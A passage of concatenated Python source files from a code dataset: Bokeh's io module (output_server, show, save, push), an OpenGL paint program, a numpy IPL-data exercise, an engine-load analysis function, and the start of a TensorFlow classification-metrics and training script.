we default to a hardcoded one. This is to support local\n# usage e.g. with a notebook.\ndef output_server(session_id=DEFAULT_SESSION_ID, url=\"default\", app_path=\"/\", autopush=False):\n \"\"\" Configure the default output state to push its document to a\n session on a Bokeh server.\n\n Sessions are in-memory and not persisted to disk; in a typical\n production deployment, you would have a fresh session ID for each\n browser tab. If different users share the same session ID, it will\n create security and scalability problems.\n\n ``output_server()`` defaults to always using the\n ``session_id`` ``\"default\"``, which is useful for running\n local demos or notebooks. 
However, if you are creating\n production sessions, you'll need to set ``session_id`` to None\n (to generate a fresh ID) or to a session ID generated elsewhere.\n\n File, server, and notebook output may be active at the same\n time, so output_server() does not clear the effects of\n output_file() or output_notebook(). output_server() changes\n the behavior of output_notebook(), so the notebook will load\n output cells from the server rather than receiving them as\n inline HTML.\n\n Args:\n session_id (str, optional) : Name of session to push on Bokeh server (default: \"default\")\n Any existing session with the same name will be overwritten.\n\n url (str, optional) : base URL of the Bokeh server (default: \"default\")\n If \"default\" use the default localhost URL.\n\n app_path (str, optional) : relative path of the app on the Bokeh server (default: \"/\")\n\n autopush (bool, optional) : whether to automatically push (default: False)\n If True, then Bokeh plotting APIs may opt to automatically\n push the document more frequently (e.g., after any plotting\n command). If False, then the document is only pushed upon calling\n :func:`show` or :func:`push`.\n\n Returns:\n None\n\n .. warning::\n Calling this function will replace any existing server-side document in the named session.\n\n \"\"\"\n\n _state.output_server(session_id=session_id, url=url, app_path=app_path, autopush=autopush)\n\ndef set_curdoc(doc):\n '''Configure the current document (returned by curdoc()).\n\n This is the document we will save or push according to\n output_file(), output_server(), etc. configuration.\n\n Args:\n doc (Document) : Document we will output.\n\n Returns:\n None\n\n .. note::\n Generally, this should be called at the beginning of an interactive\n session or the top of a script.\n\n .. warning::\n Calling this function will replace any existing document.\n\n '''\n _state.document = doc\n\ndef curdoc():\n ''' Return the document for the current default state.\n\n Returns:\n doc : the current default document object.\n\n '''\n return _state.document\n\ndef curstate():\n ''' Return the current State object\n\n Returns:\n state : the current default State object\n '''\n return _state\n\ndef show(obj, browser=None, new=\"tab\"):\n ''' Immediately display a plot object.\n\n In an IPython/Jupyter notebook, the output is displayed in an output\n cell. Otherwise, a browser window or tab is autoraised to display the\n plot object.\n\n If both a server session and notebook output have been configured on\n the default output state then the notebook output will be generated to\n load the plot from that server session.\n\n Args:\n obj (Component object) : a plot object to display\n\n browser (str, optional) : browser to show with (default: None)\n For systems that support it, the **browser** argument allows\n specifying which browser to display in, e.g. \"safari\", \"firefox\",\n \"opera\", \"windows-default\" (see the ``webbrowser`` module\n documentation in the standard lib for more details).\n\n new (str, optional) : new file output mode (default: \"tab\")\n For file-based output, opens or raises the browser window\n showing the current output file. If **new** is 'tab', then\n opens a new tab. If **new** is 'window', then opens a new window.\n\n Returns:\n when in a a jupyter notebook (with ``output_notebook`` enabled), returns\n a handle that can be used by ``push_notebook``, None otherwise.\n\n .. 
note::\n The ``browser`` and ``new`` parameters are ignored when showing in\n an IPython/Jupyter notebook.\n\n '''\n return _show_with_state(obj, _state, browser, new)\n\ndef _show_with_state(obj, state, browser, new):\n controller = browserlib.get_browser_controller(browser=browser)\n\n comms_handle = None\n\n if state.notebook:\n comms_handle = _show_notebook_with_state(obj, state)\n\n elif state.server_enabled:\n _show_server_with_state(obj, state, new, controller)\n\n if state.file:\n _show_file_with_state(obj, state, new, controller)\n\n return comms_handle\n\ndef _show_file_with_state(obj, state, new, controller):\n save(obj, state=state)\n controller.open(\"file://\" + os.path.abspath(state.file['filename']), new=_new_param[new])\n\ndef _show_notebook_with_state(obj, state):\n if state.server_enabled:\n push(state=state)\n snippet = autoload_server(obj, session_id=state.session_id_allowing_none, url=state.url, app_path=state.app_path)\n publish_display_data({'text/html': snippet})\n else:\n comms_target = make_id()\n publish_display_data({'text/html': notebook_div(obj, comms_target)})\n handle = _CommsHandle(get_comms(comms_target), state.document, state.document.to_json())\n state.last_comms_handle = handle\n return handle\n\ndef _show_server_with_state(obj, state, new, controller):\n push(state=state)\n show_session(session_id=state.session_id_allowing_none, url=state.url, app_path=state.app_path,\n new=new, controller=controller)\n\ndef save(obj, filename=None, resources=None, title=None, state=None, validate=True):\n ''' Save an HTML file with the data for the current document.\n\n Will fall back to the default output state (or an explicitly provided\n :class:`State` object) for ``filename``, ``resources``, or ``title`` if they\n are not provided.\n\n Args:\n obj (Document or model object) : a plot object to save\n\n filename (str, optional) : filename to save document under (default: None)\n If None, use the default state configuration, otherwise raise a\n ``RuntimeError``.\n\n resources (Resources, optional) : A Resources config to use (default: None)\n If None, use the default state configuration, if there is one.\n otherwise use ``resources.INLINE``.\n\n title (str, optional) : a title for the HTML document (default: None)\n If None, use the default state title value, if there is one.\n Otherwise, use \"Bokeh Plot\"\n\n validate (bool, optional) : True to check integrity of the models\n\n Returns:\n None\n\n Raises:\n RuntimeError\n\n '''\n if state is None:\n state = _state\n\n filename, resources, title = _get_save_args(state, filename, resources, title)\n\n _save_helper(obj, filename, resources, title, validate)\n\ndef _get_save_args(state, filename, resources, title):\n\n if filename is None and state.file:\n filename = state.file['filename']\n\n if resources is None and state.file:\n resources = state.file['resources']\n\n if title is None and state.file:\n title = state.file['title']\n\n if filename is None:\n raise RuntimeError(\"save() called but no filename was supplied and output_file(...) was never called, nothing saved\")\n\n if resources is None:\n warnings.warn(\"save() called but no resources were supplied and output_file(...) was never called, defaulting to resources.CDN\")\n from .resources import CDN\n resources = CDN\n\n if title is None:\n warnings.warn(\"save() called but no title was supplied and output_file(...) 
was never called, using default title 'Bokeh Plot'\")\n title = \"Bokeh Plot\"\n\n return filename, resources, title\n\ndef _save_helper(obj, filename, resources, title, validate):\n with _ModelInDocument(obj):\n if isinstance(obj, Component):\n doc = obj.document\n elif isinstance(obj, Document):\n doc = obj\n else:\n raise RuntimeError(\"Unable to save object of type '%s'\" % type(obj))\n\n if validate:\n doc.validate()\n\n html = standalone_html_page_for_models(obj, resources, title)\n\n with io.open(filename, \"w\", encoding=\"utf-8\") as f:\n f.write(decode_utf8(html))\n\n# this function exists mostly to be mocked in tests\ndef _push_to_server(session_id, url, app_path, document, io_loop):\n session = push_session(document, session_id=session_id, url=url, app_path=app_path, io_loop=io_loop)\n session.close()\n session.loop_until_closed()\n\ndef push(session_id=None, url=None, app_path=None, document=None, state=None, io_loop=None, validate=True):\n ''' Update the server with the data for the current document.\n\n Will fall back to the default output state (or an explicitly\n provided :class:`State` object) for ``session_id``, ``url``,\n ``app_path``, or ``document`` if they are not provided.\n\n Args:\n session_id (str, optional) : a Bokeh server session ID to push objects to\n\n url (str, optional) : a Bokeh server URL to push objects to\n\n app_path (str, optional) : Relative application path to push objects to\n\n document (Document, optional) : A :class:`bokeh.document.Document` to use\n\n state (State, optional) : A state to use for any output_server() configuration of session or url\n\n io_loop (tornado.ioloop.IOLoop, optional) : Tornado IOLoop to use for connecting to server\n\n validate (bool, optional) : True to check integrity of the document we are pushing\n\n Returns:\n None\n\n '''\n if state is None:\n state = _state\n\n if not session_id:\n session_id = state.session_id_allowing_none\n\n if not url:\n url = state.url\n\n if not app_path:\n app_path = state.app_path\n\n # State is supposed to ensure these are set\n assert session_id is not None\n assert url is not None\n assert app_path is not None\n\n if not document:\n document = state.document\n\n if not document:\n warnings.warn(\"No document to push\")\n\n if validate:\n document.validate()\n\n _push_to_server(session_id=session_id, url=url, app_path=app_path,\n document=document, io_loop=io_loop)\n\ndef push_notebook(document=None, state=None, handle=None):\n ''' Update the last-shown plot in a Jupyter notebook with the new data\n or property values.\n\n Args:\n\n document (Document, optional) :\n A :class:`~bokeh.document.Document` to push from. If None,\n uses ``curdoc()``.\n\n state (State, optional) :\n A Bokeh State object\n\n Returns:\n None\n\n Examples:\n\n Typical usage is typically similar to this:\n\n .. code-block:: python\n\n from bokeh.io import push_notebook\n\n # code to create a plot\n\n show(plot)\n\n plot.title = \"New Title\"\n\n # This will cause the title to update\n push_notebook()\n\n '''\n if state is None:\n state = _state\n\n if state.server_enabled:\n raise RuntimeError(\"output_server() has been called, use push() to push to server\")\n\n if not document:\n document = state.document\n\n if not document:\n warnings.warn(\"No document to push\")\n return\n\n if handle is None:\n handle = state.last_comms_handle\n\n if not handle:\n warnings.warn(\"Cannot find a last shown plot to update. 
Call output_notebook() and show() before push_notebook()\")\n return\n\n to_json = document.to_json()\n if handle.doc is not document:\n msg = dict(doc=to_json)\n else:\n msg = Document._compute_patch_between_json(handle.json, to_json)\n handle.comms.send(json.dumps(msg))\n handle.update(document, to_json)\n\ndef reset_output(state=None):\n ''' Clear the default state of all output modes.\n\n Returns:\n None\n\n '''\n _state.reset()\n\ndef _remove_roots(subplots):\n doc = _state.document\n for sub in subplots:\n if sub in doc.roots:\n doc.remove_root(sub)\n\ndef _push_or_save(obj):\n if _state.server_enabled and _state.autopush:\n push()\n if _state.file and _state.autosave:\n save(obj)\n\ndef gridplot(plot_arrangement, **kwargs):\n ''' Generate a plot that arranges several subplots into a grid.\n\n Args:\n plot_arrangement (nested list of Plots) : plots to arrange in a grid\n **kwargs: additional attributes to pass in to GridPlot() constructor\n\n .. note:: ``plot_arrangement`` can be nested, e.g [[p1, p2], [p3, p4]]\n\n Returns:\n grid_plot: a new :class:`GridPlot `\n\n '''\n subplots = itertools.chain.from_iterable(plot_arrangement)\n _remove_roots(subplots)\n grid = GridPlot(children=plot_arrangement, **kwargs)\n curdoc().add_root(grid)\n _push_or_save(grid)\n return grid\n\ndef hplot(*children, **kwargs):\n ''' Generate a layout that arranges several subplots horizontally.\n\n '''\n _remove_roots(children)\n layout = HBox(children=list(children), **kwargs)\n curdoc().add_root(layout)\n _push_or_save(layout)\n return layout\n\ndef vplot(*children, **kwargs):\n ''' Generate a layout that arranges several subplots vertically.\n\n '''\n _remove_roots(children)\n layout = VBox(children=list(children), **kwargs)\n curdoc().add_root(layout)\n _push_or_save(layout)\n return layout\n\ndef vform(*children, **kwargs):\n ''' Generate a layout that arranges several subplots vertically.\n\n '''\n layout = VBoxForm(children=list(children), **kwargs)\n curdoc().add_root(layout)\n _push_or_save(layout)\n return layout\n","sub_path":"pkgs/bokeh-0.11.1-py27_0/lib/python2.7/site-packages/bokeh/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":20046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"461109153","text":"#final project\n\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom OpenGL.GLUT import *\nfrom PIL import Image\nimport numpy as np\n\nimport sys\n\nwindowWidth=1920\nwindowHeight=1080\n\nmousePositionX = 0\nmousePositionY = 0\n\nmouseDrawPositionX = 0\nmouseDrawPositionY = 0\n\nselectedPencil=0\n\n\npencilPoints = []\neraserPoints=[]\n\npencilTextureId=0\neraserTextureId=0\nquadTextureId=0\n\nisClicked = False\nisFirst=True\n\npanelOptions=[\"Pencil\",\"Eraser\",\"Quads\"] #Ekleme yapılacak\nselectedPanel=str()\nquads=[] #quadları tutan liste\nquadPoints=[] #quadın koordinatlarını tutan liste\n\ndef LoadTexture(file):\n pencilImg = Image.open(file)\n xSize = pencilImg.size[0]\n ySize = pencilImg.size[1]\n rawReference = pencilImg.tobytes(\"raw\", \"RGB\")\n\n glClearColor(1, 1, 1, 0)\n\n # Create Texture\n id = glGenTextures(1)\n glBindTexture(GL_TEXTURE_2D, id) # bind Texture, 2d texture (x and y size)\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_REPEAT)\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_REPEAT)\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)\n glTexImage2D(GL_TEXTURE_2D, 0, 3, xSize, ySize, 0, GL_RGB, 
GL_UNSIGNED_BYTE, rawReference)\n glEnable(GL_TEXTURE_2D)\n return id\n\n\ndef display(id):\n \"\"\"Glut display function.\"\"\"\n #glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n #LoadTexture(\"img/pencil.png\")\n glBindTexture(GL_TEXTURE_2D, id)\n glBegin(GL_QUADS)\n\n glTexCoord2f(0, 0)\n glVertex3f(-1, 1, 0)\n\n glTexCoord2f(0, 1)\n glVertex3f(-1, -1, 0)\n\n glTexCoord2f(1,1)\n glVertex3f(1, -1, 0)\n\n glTexCoord2f(1,0)\n glVertex3f(1, 1, 0)\n glEnd()\n glFlush()\n\n\ndef InitGL():\n global pencilTextureId, eraserTextureId,quadTextureId\n glActiveTexture(GL_TEXTURE0)\n pencilTextureId = LoadTexture(\"./img/pencil.png\")\n eraserTextureId = LoadTexture(\"./img/eraser2.png\")\n quadTextureId=LoadTexture(\"./img/quads.png\")\n glEnable(GL_TEXTURE_2D)\n glClearColor(0.0, 0.0, 0.0, 0.0) #darkmode\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity()\n #gluOrtho2D(-6, 6, -6, 6)\n glMatrixMode(GL_MODELVIEW)\n glLoadIdentity()\n\ndef paintBackground(r,g,b):\n glColor3f(r,g,b)\n glBegin(GL_QUADS)\n glVertex2f(-1, 1)\n glVertex2f(-1, -1)\n glVertex2f(1, -1)\n glVertex2f(1, 1)\n glEnd()\n\ndef controlPanel(): #panel\n global selectedPencil\n global panelOptions\n glViewport(0, 735, 1540, 110)\n paintBackground(1,0,0)\n glViewport(0,735,100,110)\n if selectedPanel==panelOptions[0]:\n paintBackground(0.6, 0.6, 0.6)\n else:\n paintBackground(0.9,0.9,0.9)\n\n display(pencilTextureId)\n glViewport(100,735,100,110)\n if selectedPanel == panelOptions[1]:\n paintBackground(0.6, 0.6, 0.6)\n else:\n paintBackground(0.9, 0.9, 0.9)\n display(eraserTextureId)\n glViewport(200, 735, 100, 110)\n if selectedPanel == panelOptions[2]:\n paintBackground(0.6, 0.6, 0.6)\n else:\n paintBackground(0.9, 0.9, 0.9)\n display(quadTextureId)\n glViewport(300, 735, 100, 110)\n paintBackground(0, 1, 0)\n\ndef convertMousePosDrawAxis(mouseDrawPositionX,mouseDrawPositionY): #convert mouse position to drawing axis position\n point = []\n point.append ((mouseDrawPositionX-770)/770)\n point.append( (110+367.5-mouseDrawPositionY)/367.5)\n\n return point\n\ndef pencilDraw(): #Kalemin cizim yaptıgı fonksiyon\n global mousePositionX, mousePositionY\n global mouseDrawPositionX,mouseDrawPositionY\n global pencilPoints\n\n if isClicked==True:\n point = convertMousePosDrawAxis(mouseDrawPositionX,mouseDrawPositionY)\n pencilPoints.append(point)\n\ndef eraser():\n global mousePositionX, mousePositionY\n global mouseDrawPositionX, mouseDrawPositionY\n global eraserPoints\n if isClicked == True:\n point = convertMousePosDrawAxis(mouseDrawPositionX, mouseDrawPositionY)\n eraserPoints.append(point)\n glPointSize(10.0)\n glColor(0, 1, 0)\n\ndef quadDraw():\n global mousePositionX, mousePositionY\n global mouseDrawPositionX, mouseDrawPositionY\n global quads,quadPoints\n global isFirst\n '''if isClicked==True:\n if isFirst:\n point = convertMousePosDrawAxis(mousePositionX, mousePositionY)\n quadPoints.append(point)\n isFirst=False\n if len(quadsPoints)>0:\n ammar1=quadsPoints[0][0]\n ammar2=quadsPoints[0][1]\n print(\"ammar\")\n glLineWidth(5)\n glColor3f(0,0,0)\n glBegin(GL_QUADS)\n glVertex2f(ammar1[0], ammar1[1])\n glVertex2f(ammar2[0], ammar1[1])\n glVertex2f(ammar2[0], ammar2[1])\n glVertex2f(ammar1[0], ammar2[1])\n glEnd()\n glBegin(GL_QUADS)\n glVertex2f(quadsPoints[0][0][0],quadsPoints[0][0][1])\n glVertex2f(quadsPoints[0][1][0],quadPoints[0][0][1])\n glVertex2f(quadsPoints[0][1][0],quadsPoints[0][1][1])\n glVertex2f(quadsPoints[0][0][0],quadsPoints[0][1][1])\n glEnd()'''\n '''else:\n point = convertMousePosDrawAxis(mousePositionX, 
mousePositionY)\n quadPoints.append(point)\n \n glLineWidth(5)\n glColor3f(0,0,0)\n glBegin(GL_QUADS)\n glVertex2f(quadPoints[0][0],quadPoints[0][1])\n glVertex2f(mouseDrawPositionX,quadPoints[0][1])\n glVertex2f(mouseDrawPositionX,mouseDrawPositionY)\n glVertex2f(quadPoints[0][0],mouseDrawPositionY)\n glEnd()'''\n\ndef draw(): #beyaz ekrana yapılacak cizim\n global selectedPanel\n global panelOptions\n global pencilPoints\n global quadPoints,quads\n glViewport(0, 0, 1540, 735)\n paintBackground(1, 1, 1)\n if selectedPanel == panelOptions[0]:\n pencilDraw()\n glPointSize(5.0)\n glColor(0, 0, 0)\n glBegin(GL_POINTS)\n for i in range(len(pencilPoints)):\n glVertex2f(pencilPoints[i][0], pencilPoints[i][1])\n glEnd()\n if selectedPanel==panelOptions[1]:\n eraser()\n glPointSize(15.0)\n glColor(1, 1, 1)\n glBegin(GL_POINTS)\n for i in range(len(eraserPoints)):\n searchAndRemove(i)\n glEnd()\n if selectedPanel==panelOptions[2]:\n quadDraw()\n if len(quads)>0:\n print(quads)\n point1=quads[0][0]\n point2=quads[0][1]\n\n glColor3f(1,0,0)\n glBegin(GL_QUADS)\n glVertex2f(point1[0], point1[1])\n glVertex2f(point2[0], point1[1])\n glVertex2f(point2[0], point2[1])\n glVertex2f(point1[0], point2[1])\n glEnd()\n\n\ndef paint(): #Ana Fonksiyon\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n # gluPerspective( fovy, aspect, zNear, zFar )\n # gluPerspective(150, 1.5, 1, 20)\n controlPanel()\n draw()\n glutSwapBuffers()\n\ndef mouseFunction(*args):\n global selectedPanel,panelOptions,isFirst\n global mousePositionX,mousePositionY,isClicked,selectedPencil,eraserPoints,quadPoints,quads\n\n mousePositionX = args[2]\n mousePositionY = args[3]\n\n if(args[0]==GLUT_LEFT_BUTTON and args[1]==GLUT_DOWN):\n isClicked=True\n if(mousePositionX<100 and mousePositionY<110):\n selectedPanel=panelOptions[0]\n eraserPoints=[]\n elif 100 < mousePositionX < 200 and mousePositionY<110:\n selectedPanel=panelOptions[1]\n elif 200110 and selectedPanel==panelOptions[2]: #farenin ilk dokunusunda koordinat alır\n if isFirst:\n quadPoints.append(convertMousePosDrawAxis(mousePositionX,mousePositionY))\n isFirst=False\n else:\n isClicked=False\n '''elif args[0]==GLUT_LEFT_BUTTON and args[1]==GLUT_UP: #Fareden el kaldırıldıgındaki son noktayı alır \n isClicked=False\n if mousePositionY > 110 and selectedPanel==panelOptions[2]:\n quadPoints.append(convertMousePosDrawAxis(mousePositionX, mousePositionY))\n quads.append(quadPoints)'''\n\n\n glutPostRedisplay()\n\ndef mouseControl( mx, my):\n global mouseDrawPositionX,mouseDrawPositionY,quadPoints,quads\n mouseDrawPositionX = mx\n mouseDrawPositionY = my\n if mousePositionY > 110 and selectedPanel == panelOptions[2]:\n if len(quadPoints)>1:\n quadPoints.pop()\n quadPoints.append(convertMousePosDrawAxis(mouseDrawPositionX, mouseDrawPositionY))\n quads.append(quadPoints)\n print(\"quads boyutu\") #fareyle dolandırma gecince quads boyutu sabit kalıyor\n print(len(quads))\n\n\n\ndef searchAndRemove(idx):\n global pencilPoints,eraserPoints\n for i in range(len(pencilPoints)):\n if len(eraserPoints)>idx:\n if (abs(pencilPoints[i][0] - eraserPoints[idx][0])<=0.01 and abs(pencilPoints[i][1]-eraserPoints[idx][1])<=0.01):\n pencilPoints.pop(i)\n #eraserPoints.pop(idx)\n return True\n return False\n\n\n\ndef main():\n global windowWidth\n global windowHeight\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_RGB | GLUT_DOUBLE)\n glutInitWindowSize(windowWidth, windowHeight)\n glutInitWindowPosition(0,0)\n glutCreateWindow(b\"Paint 3D\")\n glutDisplayFunc(paint)\n glutIdleFunc(paint)\n 
glutMouseFunc(mouseFunction)\n glutMotionFunc(mouseControl)\n #glutSpecialFunc(keyPressed)\n InitGL()\n glutMainLoop()\n\n\nmain()\n","sub_path":"paint3D.py","file_name":"paint3D.py","file_ext":"py","file_size_in_byte":9380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"111309353","text":"# %load q01_get_total_deliveries_players/build.py\n# Default imports\nimport numpy as np\n\nipl_matches_array =np.genfromtxt('data/ipl_matches_small.csv', dtype='|S50', skip_header=1, delimiter=',')\n\n# Your Solution\ndef get_total_deliveries_played(batsman):\n batcount = 0\n #ptn=ipl_matches_array[:,13].astype(np.unicode_)\n ptn=ipl_matches_array[:,13]\n batcount = int(np.sum(ptn == batsman))\n return batcount \n\nget_total_deliveries_played(b'SR Tendulkar')\n\n\n\n","sub_path":"q01_get_total_deliveries_players/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"600507298","text":"\"\"\"Function checks the load on the engine and returns it as overloaded or not.\"\"\"\n\nimport numpy as np\nimport pandas as pd\n\ndef LoadAnalysis(EngineLoad, EngineRPM, VehicleSpeed, TripTime):\n GearRatio = 1.5\n AxleRatio = 4\n TyreSize = 12\n ExpectedSpeed = []\n MaxLoad = 0\n MaxRPM = 0\n TempEngineLoadLess = []\n TempEngineLoadMore = []\n TempEngineRPMLess = []\n TempEngineRPMMore = []\n TempVehicleSpeedLess = []\n TempVehicleSpeedMore = []\n\n CounterOverload = []\n TempCounterOverload = 0\n\n for i in EngineLoad.index:\n EngineLoad[i] = float(EngineLoad[i])\n EngineRPM[i] = float(EngineRPM[i])\n\n if MaxLoad < EngineLoad[i]:\n MaxLoad = EngineLoad[i]\n\n if MaxRPM < EngineRPM[i]:\n MaxRPM = EngineRPM[i]\n\n LoadThreshold = 0.5 * MaxLoad\n RPMThreshold = 0.5 * MaxRPM\n\n for i in EngineRPM.index:\n if (EngineLoad[i] < LoadThreshold): # Checking whether vehicle speed is less than expected speed\n TempEngineLoadLess.append([EngineLoad[i], i])\n else:\n TempEngineLoadMore.append([EngineLoad[i], i])\n\n if (EngineRPM[i] < RPMThreshold): # Checking whether vehicle speed is less than expected speed\n TempEngineRPMLess.append([EngineRPM[i], i])\n else:\n TempEngineRPMMore.append([EngineRPM[i], i])\n\n if EngineLoad[i] > LoadThreshold and EngineRPM[i] > RPMThreshold:\n TempCounterOverload = TempCounterOverload + 1 # Checking whether engine load and engine rpm are less than threshold\n CounterOverload.append(TempCounterOverload)\n\n VehicleSpeed[i] = float(VehicleSpeed[i])\n\n # ACTUAL SPEED = (ENGINE RPM * PERIMETER OF TYRE)/(AXLE RATIO * GEAR RATIO)\n ExpectedSpeed.append(\n 0.4 * (EngineRPM[i] * 60 * 3.14 * 2 * TyreSize * 25.4 * 0.000001) / (GearRatio * AxleRatio))\n\n if (VehicleSpeed[i] < (ExpectedSpeed[i])): # Checking whether vehicle speed is less than expected speed\n TempVehicleSpeedLess.append([VehicleSpeed[i], i])\n else:\n TempVehicleSpeedMore.append([VehicleSpeed[i], i])\n\n EngineLoadLess = pd.DataFrame(data=TempEngineLoadLess, columns=['EngineLoad', 'Index'])\n EngineLoadMore = pd.DataFrame(data=TempEngineLoadMore, columns=['EngineLoad', 'Index'])\n EngineRPMLess = pd.DataFrame(data=TempEngineRPMLess, columns=['EngineRPM', 'Index'])\n EngineRPMMore = pd.DataFrame(data=TempEngineRPMMore, columns=['EngineRPM', 'Index'])\n VehicleSpeedLess = pd.DataFrame(data=TempVehicleSpeedLess, columns=['VehicleSpeed', 'Index'])\n VehicleSpeedMore = pd.DataFrame(data=TempVehicleSpeedMore, columns=['VehicleSpeed', 'Index'])\n\n return 
EngineLoadLess, EngineLoadMore, EngineRPMLess, EngineRPMMore, VehicleSpeedLess, VehicleSpeedMore, ExpectedSpeed, LoadThreshold, RPMThreshold, CounterOverload\n","sub_path":"Function/DIAEngineAnalysis_LoadAnalysis/DIAEngineAnalysis.py","file_name":"DIAEngineAnalysis.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"553852528","text":"#! cd .. && python36 -m mlf.experiment\n\nimport os\nimport sys\nimport shutil\nimport logging\nimport shutil\n\nfrom .core.mnist import MnistDataset\nfrom .core.audio import AudioDataset\nfrom .core.config import AutoEncoderConfig\nfrom .models.autoencoder import autoencoder\nfrom .models.vae import vae\nfrom .tools.freeze import freeze\nfrom .models.lstm2 import lstm2\nfrom .models.cnn import cnn\n\nimport tensorflow as tf\nfrom tensorflow.contrib.tensorboard.plugins import projector\nimport numpy as np\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport json\n\ntry:\n from SigProc.histogrammer import AutomaticScale\nexcept ImportError as e:\n print(e)\n\nclass ClassificationMetricsCalculator(object):\n \"\"\"docstring for ClassificationMetricsCalculator\"\"\"\n _counter = 0\n def __init__(self, outfile, nClasses, initializer, logits, labels, name=None, seed=None):\n super(ClassificationMetricsCalculator, self).__init__()\n\n if name is None:\n ClassificationMetricsCalculator._counter += 1\n name = \"ClassificationMetricsCalculator-%03d\" % (\n ClassificationMetricsCalculator._counter)\n\n self.name = name\n self.initializer = initializer\n self.nClasses = nClasses\n self.logits = logits\n self.labels = labels\n self.seed = seed\n self.outfile = outfile\n\n self._init()\n\n def _init(self):\n y_true = tf.argmax(self.labels, 1)\n y_pred = tf.argmax(self.logits, 1)\n\n recall = [0] * self.nClasses\n update_op_rec = [None] * self.nClasses\n precision = [0] * self.nClasses\n update_op_prec = [None] * self.nClasses\n\n with tf.name_scope(self.name):\n\n for k in range(self.nClasses):\n y1 = tf.equal(y_true, k)\n y2 = tf.equal(y_pred, k)\n recall[k], update_op_rec[k] = tf.metrics.recall(\n labels=y1, predictions=y2)\n precision[k], update_op_prec[k] = tf.metrics.precision(\n labels=y1, predictions=y2)\n\n conf_mat_update, conf_mat = self._streamingConfMatrix(\n y_pred,\n y_true,\n self.nClasses)\n\n metric_vars = tf.get_collection(\n tf.GraphKeys.LOCAL_VARIABLES, scope=self.name)\n\n metric_init_op = tf.variables_initializer(var_list=metric_vars)\n\n self.op_init = [metric_init_op]\n if self.initializer is not None:\n self.op_init.append(self.initializer)\n\n self.op_update = (update_op_rec, update_op_prec, conf_mat_update)\n self.op_compute = (recall, precision, conf_mat)\n\n def _streamingConfMatrix(self, prediction, label, nClasses):\n\n with tf.name_scope(\"conf_matrix\"):\n # Compute a per-batch confusion\n batch_confusion = tf.confusion_matrix(\n label,\n prediction,\n num_classes=nClasses,\n name='batch_confusion'\n )\n\n # Create an accumulator variable to hold the counts\n confusion = tf.Variable(\n tf.zeros([nClasses, nClasses],\n dtype=tf.int32),\n name='confusion',\n collections=[tf.GraphKeys.LOCAL_VARIABLES]\n )\n\n # Create the update op for doing a \"+=\" accumulation on the batch\n confusion_update = confusion.assign(confusion + batch_confusion)\n\n return confusion_update, confusion\n\n def run(self, session):\n\n feed = {}\n if self.seed is not None:\n feed[self.seed] = 0\n\n session.run(self.op_init, 
feed_dict=feed)\n\n try:\n while True:\n session.run(self.op_update)\n\n except tf.errors.OutOfRangeError:\n self._proc(*session.run(self.op_compute))\n\n def _proc(self, recall, precision, confmat):\n precision = np.array(precision)\n recall = np.array(recall)\n confmat = np.array(confmat)\n F1 = 2 * ((precision * recall) / (precision + recall))\n\n total = 0\n correct = 0\n incorrect = 0\n errs = []\n accs = []\n for i in range(len(confmat)):\n total_class = sum(confmat[i])\n total += total_class\n err = total_class - confmat[i][i]\n incorrect += err\n acc = confmat[i][i]\n correct += acc\n errs.append(err / total_class)\n accs.append(acc / total_class)\n err_mean = incorrect / total\n acc_mean = correct / total\n\n srecall = ', '.join([\"%0.6f\" % v for v in recall])\n sprecision = ', '.join([\"%0.6f\" % v for v in precision])\n sF1 = ', '.join([\"%0.6f\" % v for v in F1])\n\n serr = ', '.join([\"%0.6f\" % v for v in errs])\n sacc = ', '.join([\"%0.6f\" % v for v in accs])\n\n # determine maximum vlaue in the confusion matrix, for alignment\n n = len(\"%s\" % np.max(confmat))\n fmt = \"%%%dd\" % n\n\n with open(self.outfile, \"a\") as af:\n def log(msg):\n msg = msg + \"\\n\"\n sys.stdout.write(msg)\n af.write(msg)\n\n log(\"recall: (%.6f) %s\" % (np.mean(recall), srecall))\n log(\"precision: (%.6f) %s\" % (np.mean(precision), sprecision))\n log(\"F1_score: (%.6f) %s\" % (np.mean(F1), sF1))\n log(\"%%error: (%.6f) %s\" % (err_mean, serr))\n log(\"accuracy: (%.6f) %s\" % (acc_mean, sacc))\n\n log(\"row: actual class\")\n log(\"col: predicted class\")\n\n # print a header for the confusion matrix\n s = \" | \".join([fmt % i for i in range(self.nClasses)])\n log(\" \" * n + \" \" + s + \" |\")\n\n # print confusion matrix data\n for i, row in enumerate(confmat):\n s = \" | \".join([fmt % v for v in row])\n log(fmt % i + \" | \" + s + \" |\")\n log(\"\\n\")\n\nclass TrainerBase(object):\n\n def __init__(self):\n super(TrainerBase, self).__init__()\n\n def checkpointExists(self):\n\n return os.path.exists(os.path.join(\n self.settings['outputDir'], \"checkpoint\"))\n\n def restore(self, sess):\n self.saver.restore(sess,\n tf.train.latest_checkpoint(self.settings['outputDir']))\n\n def beforeSession(self):\n self.init_op = tf.group(tf.global_variables_initializer(),\n tf.local_variables_initializer())\n\n self.saver = tf.train.Saver(max_to_keep=None)\n\n def train(self, sess):\n\n logging.info(\"training model\")\n\n sess.run(self.init_op)\n\n tf.train.write_graph(\n sess.graph.as_graph_def(),\n self.settings['outputDir'],\n self.settings['modelFile'],\n as_text=True\n )\n\n final_cost_train = []\n final_cost_dev = []\n\n for epoch_i in range(self.settings['nEpochs']):\n\n 